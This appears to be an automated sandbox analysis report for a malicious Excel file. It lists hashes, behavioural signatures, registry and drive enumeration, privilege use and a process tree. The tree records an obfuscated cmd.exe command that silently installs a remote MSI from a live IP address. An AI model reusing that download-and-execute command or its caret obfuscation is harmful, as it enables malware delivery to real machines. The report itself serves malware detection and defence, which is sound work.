Analysis
-
max time kernel
135s -
max time network
138s -
platform
windows10_x64 -
resource
win10 -
submitted
30-06-2020 12:08
Static task
static1
Behavioral task
behavioral1
Sample
11203780.xls
Resource
win7v200430
Behavioral task
behavioral2
Sample
11203780.xls
Resource
win10
General
-
Target
11203780.xls
-
Size
172KB
-
MD5
14b2d3f08ad6543c060d19748f526167
-
SHA1
b10646324228a4b21154ef6e7d9d5469a61364e7
-
SHA256
7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
-
SHA512
e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2708 3544 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 10 3168 msiexec.exe -
Executes dropped EXE 1 IoCs
Processes:
MSI9D1.tmppid process 808 MSI9D1.tmp -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 3264 msiexec.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Drops file in Windows directory 6 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI943.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9D1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4FC.tmp msiexec.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3544 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
msiexec.exepid process 3168 msiexec.exe 3168 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 3264 msiexec.exe Token: SeIncreaseQuotaPrivilege 3264 msiexec.exe Token: SeSecurityPrivilege 3168 msiexec.exe Token: SeCreateTokenPrivilege 3264 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3264 msiexec.exe Token: SeLockMemoryPrivilege 3264 msiexec.exe Token: SeIncreaseQuotaPrivilege 3264 msiexec.exe Token: SeMachineAccountPrivilege 3264 msiexec.exe Token: SeTcbPrivilege 3264 msiexec.exe Token: SeSecurityPrivilege 3264 msiexec.exe Token: SeTakeOwnershipPrivilege 3264 msiexec.exe Token: SeLoadDriverPrivilege 3264 msiexec.exe Token: SeSystemProfilePrivilege 3264 msiexec.exe Token: SeSystemtimePrivilege 3264 msiexec.exe Token: SeProfSingleProcessPrivilege 3264 msiexec.exe Token: SeIncBasePriorityPrivilege 3264 msiexec.exe Token: SeCreatePagefilePrivilege 3264 msiexec.exe Token: SeCreatePermanentPrivilege 3264 msiexec.exe Token: SeBackupPrivilege 3264 msiexec.exe Token: SeRestorePrivilege 3264 msiexec.exe Token: SeShutdownPrivilege 3264 msiexec.exe Token: SeDebugPrivilege 3264 msiexec.exe Token: SeAuditPrivilege 3264 msiexec.exe Token: SeSystemEnvironmentPrivilege 3264 msiexec.exe Token: SeChangeNotifyPrivilege 3264 msiexec.exe Token: SeRemoteShutdownPrivilege 3264 msiexec.exe Token: SeUndockPrivilege 3264 msiexec.exe Token: SeSyncAgentPrivilege 3264 msiexec.exe Token: SeEnableDelegationPrivilege 3264 msiexec.exe Token: SeManageVolumePrivilege 3264 msiexec.exe Token: SeImpersonatePrivilege 3264 msiexec.exe Token: SeCreateGlobalPrivilege 3264 msiexec.exe Token: SeRestorePrivilege 3168 msiexec.exe Token: SeTakeOwnershipPrivilege 3168 msiexec.exe Token: SeRestorePrivilege 3168 msiexec.exe Token: SeTakeOwnershipPrivilege 3168 msiexec.exe Token: SeRestorePrivilege 3168 msiexec.exe Token: SeTakeOwnershipPrivilege 3168 msiexec.exe Token: SeRestorePrivilege 3168 msiexec.exe Token: SeTakeOwnershipPrivilege 3168 msiexec.exe Token: SeRestorePrivilege 3168 msiexec.exe Token: SeTakeOwnershipPrivilege 3168 msiexec.exe Token: SeRestorePrivilege 3168 msiexec.exe Token: SeTakeOwnershipPrivilege 3168 msiexec.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
EXCEL.EXEcmd.exemsiexec.exedescription pid process target process PID 3544 wrote to memory of 2708 3544 EXCEL.EXE cmd.exe PID 3544 wrote to memory of 2708 3544 EXCEL.EXE cmd.exe PID 2708 wrote to memory of 3264 2708 cmd.exe msiexec.exe PID 2708 wrote to memory of 3264 2708 cmd.exe msiexec.exe PID 3168 wrote to memory of 808 3168 msiexec.exe MSI9D1.tmp PID 3168 wrote to memory of 808 3168 msiexec.exe MSI9D1.tmp PID 3168 wrote to memory of 808 3168 msiexec.exe MSI9D1.tmp
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\11203780.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/11203780.msi /qn2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msiexec.exemsiExec /i http://199.195.250.60/gg/11203780.msi /qn3⤵
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSI9D1.tmp"C:\Windows\Installer\MSI9D1.tmp"2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Installer\MSI9D1.tmpMD5
42013c93a1711781565cb1373a43f971
SHA115a6ee651a4d11d55c2c130295c0f53741a2be62
SHA256dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
SHA5123b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
-
C:\Windows\Installer\MSI9D1.tmpMD5
42013c93a1711781565cb1373a43f971
SHA115a6ee651a4d11d55c2c130295c0f53741a2be62
SHA256dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
SHA5123b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
-
memory/808-7-0x0000000000000000-mapping.dmp
-
memory/2708-3-0x0000000000000000-mapping.dmp
-
memory/3264-4-0x0000000000000000-mapping.dmp
-
memory/3264-5-0x000002A80C2E0000-0x000002A80C2E4000-memory.dmpFilesize
16KB